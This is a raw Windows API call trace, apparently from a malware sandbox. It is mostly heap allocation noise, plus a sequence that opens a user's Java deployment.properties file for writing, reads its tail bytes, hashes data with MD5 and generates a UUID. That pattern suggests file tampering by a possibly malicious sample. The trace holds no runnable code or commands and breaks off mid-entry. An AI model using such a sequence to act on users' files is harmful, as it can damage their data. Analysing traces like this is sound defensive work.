[0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0098.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0098.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0098.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.305] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.305] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.305] PathFindFileNameW (pszPath="") returned="" [0098.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0098.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.307] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=719) returned 1 [0098.307] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.312] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.312] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.314] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.316] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.317] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.317] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.317] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.317] GetLastError () returned 0x0 [0098.317] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.317] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.317] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.317] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.318] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2d0) returned 0x31beb38 [0098.318] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbe30 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5108 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbe78 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.318] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5168 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5150 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.319] GetCurrentThreadId () returned 0x8c4 [0098.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fac40 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.320] GetCurrentThreadId () returned 0x8c4 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5180 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap 